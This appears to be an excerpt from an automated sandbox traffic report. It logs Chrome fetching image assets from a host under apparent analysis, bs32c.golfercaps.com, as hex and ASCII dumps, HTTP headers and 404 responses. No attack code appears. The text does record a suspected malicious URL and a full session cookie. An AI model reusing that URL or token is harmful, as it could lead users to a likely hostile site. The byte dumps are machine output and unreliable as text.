                                                                  2024-12-30 21:42:39 UTC1369INData Raw: c1 60 07 97 be d1 0a 1c bd 0c c1 f7 fd 3e 8c 11 43 31 ab c4 98 83 d3 6e e9 47 d3 5b b9 1c ca b7 49 37 0b 92 ca 9f cf 6c 44 aa db 31 16 7a 50 ff 5a 3e 36 88 39 1f 63 e7 0a 4d 7c 34 02 27 ee a9 c2 e1 2f d4 20 6c 32 3b 5d ed e2 ac 9d 93 6c cc 56 57 e6 01 87 fe ae 06 5d 0f 55 21 64 78 e9 3b 46 59 b6 52 96 b3 3f 92 91 a5 89 09 ac d4 a0 09 b4 ac 8b 21 68 e3 ae a9 d2 45 33 01 29 e5 42 60 eb 1c 12 4d 8f 53 64 ef c5 c5 c8 58 10 ab 7e d3 85 50 3d 8d 31 df 56 8d ac e1 7e 94 86 fb 80 39 c3 95 27 1c 5b 93 c0 e2 c7 e8 4e 1d ce 34 4e 05 ca 6b ec b0 83 2d e7 c7 bd 0d df 26 96 be 9e 67 95 08 60 d5 e3 5d 08 4a 8e b9 3c 78 89 ac 96 93 db 6f 43 d8 fd de 06 ef 44 8e 49 02 f2 36 64 2f 4b 62 e9 6f e8 c2 2b 8c e0 57 94 3d 01 56 3a 82 69 5b e9 58 13 f7 b6 97 14 d3 80 e5 b5 04 1a
                                                                  Data Ascii: `>C1nG[I7lD1zPZ>69cM|4'/ l2;]lVW]U!dx;FYR?!hE3)B`MSdX~P=1V~9'[N4Nk-&g`]J<xoCDI6d/Kbo+W=V:i[X
                                                                  2024-12-30 21:42:39 UTC1369INData Raw: b1 1b a1 a5 84 9c 7c 7b 7f 19 c6 9e 8f d6 1b 3b b6 a5 4d c5 f5 af 1d c3 c2 1f 52 f9 26 3b 0d 30 11 f4 b8 92 47 1c 0c 6d 0b 22 35 52 9c 8e ba e4 e3 fa 37 8c a5 bd 91 7c 36 c9 9f 4e d1 33 ec 79 24 82 50 a3 6b e9 6f 22 12 40 d5 b2 24 aa 16 53 80 f9 96 be 12 5a 14 e8 fe 69 04 81 5a be 31 a0 77 e3 e1 0e 73 e5 7d 31 15 51 99 7d 3b 80 f9 51 d1 04 a8 a4 02 75 a0 e3 dc 59 08 05 39 27 1a b8 37 25 17 10 70 71 f6 3e 2e 7d b5 e5 65 ba ca a7 2c ab c8 a9 98 06 a3 e5 50 3e f2 cb 42 bf af 2d 13 16 b9 a1 ad 24 d4 ad 49 c7 29 43 82 a6 c9 ef 14 2c f9 4d 8d 53 04 78 70 ad 8b ce 1f 94 27 01 6a 90 73 29 e3 3c 60 db 39 0d 48 74 9a 3b b6 25 ef 6f ee 47 86 30 f7 d3 99 12 43 a5 a2 80 22 e6 5c 4b b5 f1 50 5f 55 59 c7 b4 c1 8a 4c a6 22 e4 89 90 9e 1a 8c a9 79 90 7c 34 79 4c 45 7a ea
                                                                  Data Ascii: |{;MR&;0Gm"5R7|6N3y$Pko"@$SZiZ1ws}1Q};QuY9'7%pq>.}e,P>B-$I)C,MSxp'js)<`9Ht;%oG0C"\KP_UYL"y|4yLEz
                                                                  2024-12-30 21:42:39 UTC1369INData Raw: 7d 2c 8c 3d 1f 34 77 92 e7 d4 43 83 f6 50 cf 26 2b 12 ab 76 ca b1 63 3e bd bf 19 78 3e 4a a9 40 ba 37 26 af fe c9 2e 12 1d 1b b2 b6 39 07 38 f6 d9 6a 1c fb 41 cc e8 ce 82 e9 20 c5 75 fa ac cb d7 23 a0 e3 3a ea a4 06 b2 54 2f aa 18 ce fa 0f 6a a4 14 4d f2 d4 c5 55 51 e7 d7 ab d0 d7 61 2e 2b 58 6a d0 ec ab 65 e5 f2 8d dd 68 7e 1f c9 6f b2 b3 9f 92 59 9c fc 73 73 35 86 f6 98 2b 6d af 3e 86 e3 29 b4 7d 8d e4 a7 13 32 85 10 19 3d 79 ed 13 dc f3 41 c3 0f 5e 4f 05 d0 fe 10 f5 4c 4b f4 c9 ec 96 5e 73 f2 20 2f 76 cc 29 85 3d 6d 33 00 dd b5 57 6c f5 b6 3e 38 8a f1 71 9c bd 46 55 10 7f 3c e8 91 5f 84 63 97 cb 9e 4b e2 62 67 c5 7d 81 14 97 96 ca ce 68 ff 5a 29 5e 12 f2 82 eb fb 11 5e 4a 43 c8 96 1c af a2 e1 ef 77 70 f0 4b b5 be 2c d7 e4 cd bc f4 aa 22 6d 29 cf 2b f6
                                                                  Data Ascii: },=4wCP&+vc>x>J@7&.98jA u#:T/jMUQa.+Xjeh~oYss5+m>)}2=yA^OLK^s /v)=m3Wl>8qFU<_cKbg}hZ)^^JCwpK,"m)+
                                                                  2024-12-30 21:42:39 UTC172INData Raw: c6 60 fd 95 e7 ad 4b f7 96 bd bf f2 e3 bf b4 bc b2 21 98 f1 50 e5 6b e9 59 b9 41 76 e6 65 81 2b f5 a1 48 16 16 16 16 f9 20 02 6c be c6 d2 9e 85 85 85 7f 61 09 d0 c2 c2 c2 b7 b0 04 68 61 61 e1 5b 58 02 b4 b0 b0 f0 2d 2c 01 5a 58 58 f8 16 96 00 2d 2c 2c 7c 0b 4b 80 16 16 16 be 85 25 40 0b 0b 0b df c2 12 a0 85 85 85 6f e1 b8 bb af 74 f1 ec fd 96 0a 2d 2c 2c fc 03 9d 04 99 7d 25 09 f0 f8 dd 2e fa 7e 4d 2a ac 4a 7f 60 61 61 61 51 e9 d0 43 67 ea de 88 ff 07 10 1f 9a 22 31 94 34 0a 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                  Data Ascii: `K!PkYAve+H lahaa[X-,ZXX-,,|K%@ot-,,}%.~M*J`aaaQCg"14IENDB`


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  49192.168.2.458509188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:39 UTC1401OUTGET /vfd23ced/assets/bg.jpg HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:40 UTC885INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:40 GMT
                                                                  Content-Type: image/jpeg
                                                                  Content-Length: 4253111
                                                                  Connection: close
                                                                  Last-Modified: Fri, 06 Dec 2024 11:08:25 GMT
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: REVALIDATED
                                                                  Accept-Ranges: bytes
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iIPUZTUgreuZCR5LW8j3ke1vG%2FrQsV6W4ku4vJiUNTQr1JOIjARkTtqGm389VFYs0H8AdPCIVYV0%2Ft%2FuMcRAB8jmq9RHNzETIYMICdnwkF1LRMFnrZO79ST5NWLUOyO0L%2F0958WNfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa533746c018cda-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2034&min_rtt=2029&rtt_var=771&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1979&delivery_rate=1411309&cwnd=242&unsent_bytes=0&cid=97e6e5448dc29591&ts=301&x=0"
                                                                  2024-12-30 21:42:40 UTC484INData Raw: ff d8 ff e1 18 c3 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 13 00 00 01 03 00 01 00 00 00 d0 21 00 00 01 01 03 00 01 00 00 00 8b 16 00 00 02 01 03 00 03 00 00 00 f2 00 00 00 03 01 03 00 01 00 00 00 05 00 00 00 06 01 03 00 01 00 00 00 02 00 00 00 0e 01 02 00 e6 00 00 00 f8 00 00 00 0f 01 02 00 06 00 00 00 de 01 00 00 10 01 02 00 10 00 00 00 e4 01 00 00 12 01 03 00 01 00 00 00 01 00 00 00 15 01 03 00 01 00 00 00 03 00 00 00 1a 01 05 00 01 00 00 00 f4 01 00 00 1b 01 05 00 01 00 00 00 fc 01 00 00 1c 01 03 00 01 00 00 00 01 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 26 00 00 00 04 02 00 00 32 01 02 00 14 00 00 00 2a 02 00 00 3b 01 02 00 11 00 00 00 3e 02 00 00 98 82 02 00 19 00 00 00 4f 02 00 00 69 87 04 00 01 00 00 00 68 02 00 00 b8 04 00 00 08
                                                                  Data Ascii: ExifII*!(1&2*;>Oih
                                                                  2024-12-30 21:42:40 UTC1369INData Raw: 72 64 65 6e 2e 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 53 20 52 00 c0 c6 2d 00 10 27 00 00 c0 c6 2d 00 10 27 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 32 30 31 37 3a 31 31 3a 32 33 20 31 37 3a 32 32 3a 31 39 00 43 68 72 69 73 74 6f 70 68 20 50 61 70 73 63 68 00 77 77 77 2e 63 68 72 69 73 74 6f 70 68 2d 70 61 70 73 63 68 2e 63 6f 6d 00 21 00 9a 82 05 00 01 00 00 00 fa 03 00 00 9d 82 05 00 01 00 00 00 02 04 00 00 22 88 03 00 01 00 00 00 03 00 00 00 27 88 03 00 01 00 00 00 64 00 00 00 30 88 03 00 01 00 00 00 02 00 00 00 32 88 04 00 01 00 00 00 64 00 00 00 00 90 07 00 04 00 00 00 30 32 33 30 03 90 02 00 14 00 00 00 0a 04 00 00 04 90 02 00 14 00 00 00 1e 04 00 00 01
                                                                  Data Ascii: rden.CanonCanon EOS 5DS R-'-'Adobe Photoshop CC 2015.5 (Macintosh)2017:11:23 17:22:19Christoph Papschwww.christoph-papsch.com!"'d02d0230
                                                                  2024-12-30 21:42:40 UTC1369INData Raw: 65 3f 42 15 e3 96 da 23 1b 48 d4 97 a6 ae fa 29 0a 7c 92 f7 14 71 b5 ab 64 2b 35 b5 49 b4 a3 32 a8 4d 94 c2 63 05 d8 11 9a 14 5a c4 56 b5 44 4b 34 62 c9 a1 49 20 14 a1 30 96 40 18 a4 a7 09 88 42 d5 48 9c 84 f0 8e 42 1b 9a 9c 0a d9 06 a3 c6 aa bb da af 3a b9 43 75 4a 51 26 23 07 3d d5 a6 15 ab a6 94 bd 14 ef 71 6f b6 d2 34 cf 64 0b f1 03 d8 41 1f 05 ad e8 a6 38 f3 d9 21 96 92 71 db ff d0 eb 31 fa d3 80 03 26 90 ef 17 d4 7f ef 8e 5a 14 66 60 e4 69 5d a0 38 fe 63 fd a7 fe 92 c2 65 73 a3 75 23 90 35 23 e2 15 6e a1 91 91 86 18 e6 61 59 97 59 9f 55 cc 21 bb 35 0d 60 da e0 ed ee 7a e6 79 6f 8d 73 71 90 81 31 cd 7d 32 11 03 ff 00 86 7a 3f e7 ba 12 e4 71 cc d4 47 0c 8f 63 a7 fc e7 ad 34 c7 21 37 a4 b9 3c 1f ac f8 ed b5 b8 ed ba ec 2b 9c 61 b4 64 b0 b4 12 78 fa 5e
                                                                  Data Ascii: e?B#H)|qd+5I2McZVDK4bI 0@BHB:CuJQ&#=qo4dA8!q1&Zf`i]8cesu#5#naYYU!5`zyosq1}2z?qGc4!7<+adx^
                                                                  2024-12-30 21:42:40 UTC1369INData Raw: 7f 48 b2 3f e6 4f 4a 3c df 92 63 c4 d7 ff 00 a4 95 e1 d0 f1 98 c6 57 55 b6 d5 55 6d 0c ad 8d d8 00 03 93 f4 3d ef b1 ff 00 a4 b2 c7 26 f3 19 39 79 88 08 ce a3 1f d1 8e 3f 6b d4 7e 69 fe 97 ab fe 82 72 1c 72 e1 02 54 07 68 f0 fd 5b 55 65 62 5e e2 ca 6e 65 ae 02 48 61 dd a7 1d be 2a 64 68 83 89 80 cc 47 bd ed b1 f6 17 80 df 78 66 80 1d da 7a 6c 62 39 12 40 f1 2a ac b8 44 bd 24 98 f8 b0 ca af d2 6c 3f ff d2 ea 1a 37 33 78 92 22 40 03 53 de 03 4c 7b 92 04 10 08 e0 ea 0a 87 a7 2d dc d2 e6 81 f4 dc 34 04 7e 76 ff 00 cd fe da cd cc fa d5 f5 7b 09 db 2d ce a9 d6 70 2a a2 6f 74 8f cc 8c 7f 51 8d 77 f5 de b8 bc b8 f9 7c 90 84 39 4c 79 b2 66 12 97 b8 48 e2 f4 7f 93 f4 43 8d d3 12 98 24 e4 31 11 a1 5e 7f a4 eb 25 a2 e3 b3 3f c6 13 1b 0c e9 fd 3d f6 39 da 34 e5 5a ca
                                                                  Data Ascii: H?OJ<cWUUm=&9y?k~irrTh[Ueb^neHa*dhGxfzlb9@*D$l?73x"@SL{-4~v{-p*otQw|9LyfHC$1^%?=94Z
                                                                  2024-12-30 21:42:40 UTC1369INData Raw: 43 3d 46 ff 00 dd 3a 7d 3c 2a bf d1 dd fc ea 8d 2c 0d 87 13 27 b0 40 a4 17 41 b7 5d 7d 86 fc ab 1d 65 8e d4 b9 e6 49 ff 00 cc 5b f9 8c ff 00 b6 d5 ca 2d d6 49 59 95 bc 92 24 e8 ac b6 e0 3b f0 98 42 e0 5d 27 e5 10 d8 ee 55 8b ec 8a 0d 2e 24 16 51 5e 9e 76 3f d5 77 fd 1d ab 1a a7 9b f2 1b 50 3f 48 86 8f 99 85 77 3a d0 f7 65 41 1e eb 9b 5c eb f4 6b 04 6c d7 fa a9 b5 a1 5f c5 b3 a1 d5 6c f6 40 99 63 9a f1 a6 9b 2e a9 8e fa 5f f1 94 bd 62 df 61 20 3b 49 1a 49 ed fb b3 ff 00 50 f5 b5 90 e3 6e 33 db cf a9 81 55 ac 77 67 7a 05 af 9d 7f e0 ed b1 73 8e b0 92 5a 4c 83 2d 29 c0 2c b5 8e 41 6b c1 98 0e d0 4f e6 b8 72 d2 9b d5 b5 81 cd a9 ad b2 b7 c1 bb 12 c9 35 bc 8f cf 6e d2 c7 d5 6b 7f 32 ea 1f 5d f5 fe 65 9f e0 d5 7b 1d c8 77 90 7f fe 8a bb fe f8 f5 16 d8 47 b5 fa
                                                                  Data Ascii: C=F:}<*,'@A]}eI[-IY$;B]'U.$Q^v?wP?Hw:eA\kl_l@c._ba ;IIPn3UwgzsZL-),AkOr5nk2]e{wG
                                                                  2024-12-30 21:42:40 UTC1369INData Raw: 4a 66 21 a0 11 a9 29 17 1e 07 8f 3e 6a 2e e3 bf 3a 4f 09 bb 7d d1 e0 92 92 04 e5 da 69 db ba 88 ef cf 7e 53 77 fe ef e0 92 97 dd c0 e3 e7 d9 40 1d ce 1a fc d4 4c eb 3e 1e 5f 8a 4c fa 4e 89 f2 f1 fc 52 53 b3 7b 4d 3d 03 1d b2 27 2e cd c7 c7 bf fd f1 b5 a1 f5 57 fe 83 14 01 ec de e3 23 f3 a0 0f 7b 87 f5 bd ad 52 ea 71 f6 3c 1e 23 68 e2 76 70 df a3 f9 db 50 fa c4 fa 58 5c 7e 74 f1 1f 49 9f cd ff 00 2b fa 88 14 87 67 a4 4d df 51 ef ac fd 2a ac bf e8 8e 36 9a f2 3c ff 00 35 56 eb a3 d7 c6 e9 d9 a2 3f 4d 47 a4 48 d3 dd 4e 9f 9d fd 65 6b ea e7 fe 24 f3 e3 fd 36 44 4f 1f cd 33 c5 52 cb ff 00 c4 e6 14 ed fe 7d ff 00 18 db fc 94 82 1c 59 8e 4f 1c 15 33 ab 64 68 e1 24 76 12 a3 ac 9e 7e 51 1f d9 4e d9 d6 27 f0 45 4c 9c e6 cb 6d 1f 45 df 48 78 1f de 51 73 e0 87 b7 b1
                                                                  Data Ascii: Jf!)>j.:O}i~Sw@L>_LNRS{M='.W#{Rq<#hvpPX\~tI+gMQ*6<5V?MGHNek$6DO3R}YO3dh$v~QN'ELmEHxQs
                                                                  2024-12-30 21:42:40 UTC1369INData Raw: 73 4d 62 6f 6f 6c 00 00 00 00 00 43 72 6e 43 62 6f 6f 6c 00 00 00 00 00 43 6e 74 43 62 6f 6f 6c 00 00 00 00 00 4c 62 6c 73 62 6f 6f 6c 00 00 00 00 00 4e 67 74 76 62 6f 6f 6c 00 00 00 00 00 45 6d 6c 44 62 6f 6f 6c 00 00 00 00 00 49 6e 74 72 62 6f 6f 6c 00 00 00 00 00 42 63 6b 67 4f 62 6a 63 00 00 00 01 00 00 00 00 00 00 52 47 42 43 00 00 00 03 00 00 00 00 52 64 20 20 64 6f 75 62 40 6f e0 00 00 00 00 00 00 00 00 00 47 72 6e 20 64 6f 75 62 40 6f e0 00 00 00 00 00 00 00 00 00 42 6c 20 20 64 6f 75 62 40 6f e0 00 00 00 00 00 00 00 00 00 42 72 64 54 55 6e 74 46 23 52 6c 74 00 00 00 00 00 00 00 00 00 00 00 00 42 6c 64 20 55 6e 74 46 23 52 6c 74 00 00 00 00 00 00 00 00 00 00 00 00 52 73 6c 74 55 6e 74 46 23 50 78 6c 40 72 c0 00 00 00 00 00 00 00 00 0a 76 65 63 74
                                                                  Data Ascii: sMboolCrnCboolCntCboolLblsboolNgtvboolEmlDboolIntrboolBckgObjcRGBCRd doub@oGrn doub@oBl doub@oBrdTUntF#RltBld UntF#RltRsltUntF#Pxl@rvect
                                                                  2024-12-30 21:42:40 UTC1369INData Raw: 00 00 00 00 54 6f 70 20 6c 6f 6e 67 00 00 00 00 00 00 00 00 4c 65 66 74 6c 6f 6e 67 00 00 00 00 00 00 00 00 42 74 6f 6d 6c 6f 6e 67 00 00 0b 13 00 00 00 00 52 67 68 74 6c 6f 6e 67 00 00 10 9c 00 00 00 03 75 72 6c 54 45 58 54 00 00 00 01 00 00 00 00 00 00 6e 75 6c 6c 54 45 58 54 00 00 00 01 00 00 00 00 00 00 4d 73 67 65 54 45 58 54 00 00 00 01 00 00 00 00 00 06 61 6c 74 54 61 67 54 45 58 54 00 00 00 01 00 00 00 00 00 0e 63 65 6c 6c 54 65 78 74 49 73 48 54 4d 4c 62 6f 6f 6c 01 00 00 00 08 63 65 6c 6c 54 65 78 74 54 45 58 54 00 00 00 01 00 00 00 00 00 09 68 6f 72 7a 41 6c 69 67 6e 65 6e 75 6d 00 00 00 0f 45 53 6c 69 63 65 48 6f 72 7a 41 6c 69 67 6e 00 00 00 07 64 65 66 61 75 6c 74 00 00 00 09 76 65 72 74 41 6c 69 67 6e 65 6e 75 6d 00 00 00 0f 45 53 6c 69 63
                                                                  Data Ascii: Top longLeftlongBtomlongRghtlongurlTEXTnullTEXTMsgeTEXTaltTagTEXTcellTextIsHTMLboolcellTextTEXThorzAlignenumESliceHorzAligndefaultvertAlignenumESlic
                                                                  2024-12-30 21:42:40 UTC1369INData Raw: e6 27 1e f1 3c 4d 63 8c c4 d1 04 79 ac 1a a4 02 70 14 80 4e b5 00 a0 13 c2 41 4a 10 b5 cb 42 62 14 93 14 94 c0 85 02 11 13 42 36 82 11 16 a8 9a e5 12 c7 d7 53 77 5a f6 d6 df 17 18 fc aa 95 dd 67 0e b9 15 ee b9 df c9 10 3f ce 77 fe 45 45 9b 9b c3 84 7e b7 24 61 e0 4f ab fc 4f 99 31 c5 29 fc b1 25 b3 e9 24 e6 31 8d 2f 79 0d 68 e5 ce 30 3e f2 b2 2e eb 19 b6 69 50 6d 23 b4 0d ce ff 00 39 ca 8d a6 db 5d ba e7 b9 ee 1d dc 49 3f 8a cc cf ff 00 18 30 c6 c6 28 4b 21 ee 7f 57 0f fb e6 c4 39 19 1f 98 88 ff 00 ce 2e cd fd 5b a7 d3 a0 71 b4 f8 30 69 fe 7b f6 b3 fc d5 9f 91 d7 72 5c 23 1e a1 58 3d e3 73 bf ce b3 65 6d ff 00 31 54 d9 e0 13 16 2c cc df 1a e6 f2 68 24 31 47 b6 3d 3f e7 fc ed 98 72 78 a3 d3 8b fb df c1 ff d1 d8 ca e9 34 e5 5c 6f 36 1a de 40 07 da 1c 34 ef
                                                                  Data Ascii: '<McypNAJBbB6SwZg?wEE~$aOO1)%$1/yh0>.iPm#9]I?0(K!W9.[q0i{r\#X=sem1T,h$1G=?rx4\o6@4
                                                                  2024-12-30 21:42:40 UTC1369INData Raw: 8d 65 96 cf a6 c7 18 2e 8e 76 8f fb f2 c7 ce fa c9 d1 69 ce ad 8e c9 0e 20 7b dd 50 36 35 a4 1d f1 6b ab fd f6 bb f4 6b 81 7f 52 ea b9 db 5f 76 65 d6 07 01 b9 a5 fb 1a db 18 e2 1f ec af 6d 6f fa 35 b9 9e c4 6a b1 ad b3 68 6b 6b 63 5b c4 03 26 75 73 9e e7 3a c7 bd df db 5a 18 3e 01 11 ae 6c 84 9a 23 87 1e 9f 5e 29 ff 00 de 2c 97 37 fb a3 eb 2f e0 f7 2c fa cf f6 80 5d 8c 2b c7 ad bb 77 d9 98 ed 9b 41 dd ed ae aa 5d 63 f2 5f ed fc c6 ab 5d 3b ab 3e d7 59 ea db ea b5 a4 6c 7e c3 50 3f bd b6 ad cf f6 7e ee e7 6f 5c a6 16 2f a6 ca cd e4 10 d0 4d 67 6c 4b 5c 7f 33 f7 f8 fa 6b 67 1d fc 18 da de cd f1 f8 ad 0c 3c 8e 1c 04 18 47 e5 d2 3c 5e b3 1f 23 2f 97 fc 06 23 94 cb 7e bd 9e 9e ac c0 e0 20 fc ff 00 b9 58 fb 66 bc e8 d8 9f 89 2b 0e 9b f6 b7 71 85 33 90 f3 8c 5c
                                                                  Data Ascii: e.vi {P65kkR_vemo5jhkkc[&us:Z>l#^),7/,]+wA]c_];>Yl~P?~o\/MglK\3kg<G<^#/#~ Xf+q3\


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  50192.168.2.458512188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:39 UTC1439OUTGET /vfd23ced/assets/icon_check_checked.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
                                                                  2024-12-30 21:42:40 UTC839INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 30 Dec 2024 21:42:40 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: EXPIRED
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UmHR36VjHtjA%2BG6PxoQgIKlPhQKyn8GTKQB5d8GvwxJkVmMhhv3nsiqlZOWXe2axSX3zoSOijTAIfoPebcHn5ZCatUrEHRC%2BvVGJDn9aH82yRzN%2FL0cp9NXlf9G93k4HNrh1AhpoyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa53374488cf3bb-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1512&min_rtt=1509&rtt_var=572&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2039&delivery_rate=1901041&cwnd=82&unsent_bytes=0&cid=1f4a4a71402bf063&ts=265&x=0"
                                                                  2024-12-30 21:42:40 UTC322INData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74
                                                                  Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying t
                                                                  2024-12-30 21:42:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  51192.168.2.458510188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:39 UTC1447OUTGET /vfd23ced/assets/icon_check_checked_focused.png HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
